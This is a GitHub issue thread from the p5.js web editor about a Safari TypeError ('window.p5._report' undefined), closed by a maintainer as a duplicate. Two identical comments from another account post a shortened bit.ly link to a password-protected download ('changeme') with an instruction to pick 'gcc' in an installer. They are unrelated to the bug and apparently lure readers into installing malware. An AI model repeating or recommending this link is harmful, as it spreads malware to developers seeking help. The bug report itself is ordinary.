### ISSUE TITLE
window.p5._report is not defined

### ISSUE THREAD

**Issue by Vijay-code-it** [processing/p5.js-web-editor#3225]
### p5.js version

V.1.4.0

### What is your operating system?

iOS

### Web browser and version

Safari 17

### Actual Behavior

TypeError: undefined is not an object (evaluating 'window.p5._report')
    at undefined:2:37015

### Expected Behavior

<img width="1050" alt="image" src="https://github.com/user-attachments/assets/d296070d-fe11-4b25-926e-df4bc459ced8">

### Steps:
1. 2. 3.
### Snippet:
```js

// Paste your code here :)

```
[Butter_gastonia_copy_2024_08_27_16_44_42.zip](https://github.com/user-attachments/files/16766112/Butter_gastonia_copy_2024_08_27_16_44_42.zip)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by raclim** [comment]
Thanks for opening this issue! I just realized that this issue has been reported earlier in the repo, so to help consolidate issues I'm going to close this one for now!

**Comment by Vijay-code-it** [comment]
> Thanks for opening this issue! I just realized that this issue has been reported earlier in the repo, so to help consolidate issues I'm going to close this one for now!

Please help why I am still not able to resolve this error in p5.js scripts coding,

**Comment by Vijay-code-it** [comment]
Console
Clear

TypeError: undefined is not an object (evaluating 'window.p5._report')
